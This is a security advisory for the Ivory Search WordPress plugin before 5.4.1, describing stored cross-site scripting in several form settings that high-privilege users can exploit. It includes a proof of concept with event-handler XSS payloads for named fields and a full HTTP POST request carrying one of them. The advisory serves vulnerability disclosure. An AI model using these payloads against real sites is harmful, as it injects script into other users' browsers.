Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting

The plugin does not escape some of the Form settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

PoC

Go to the AJAX settings of a Form and put the following payload in the “Minimum number of characters required to run ajax search.” (min_no_for_search field) or “Text when there is no search results” (nothing_found_text field) settings: “style=animation-name:rotation onanimationstart=alert(/XSS/)// yo=” Note: The min_no_for_search field is only validated to be a number client side. For the _is_settings[highlight_color] parameter, a payload such as " autofocus=autofocus onfocus=alert(/XSS/)// oni=" can be used POST /wp-admin/admin.php?page=ivory-search&post;=14&tab;=options HTTP/2 Cookie: [admin cookies] Content-Type: application/x-www-form-urlencoded _wpnonce=e29855f021&post;_ID=14&is;_locale=&action;=save&tab;=options&_is_settings%5Bposts_per_page%5D=10&_is_settings%5Bhighlight_terms%5D=1&_is_settings%5Bhighlight_color%5D=%23FFFFB%22+autofocus%3Dautofocus+onfocus%3Dalert%28/XSS/%29%2F%2F+oni%3D%22&_is_settings%5Bterm_rel%5D=OR&_is_settings%5Bfuzzy_match%5D=2&_is_settings%5Bsearch_engine%5D=index&_is_settings%5Bmove_sticky_posts%5D=1&_is_settings%5Bdemo%5D=1&_is_settings%5Bdisable%5D=1&_is_settings%5Bempty_search%5D=1&is;_save=Save+Form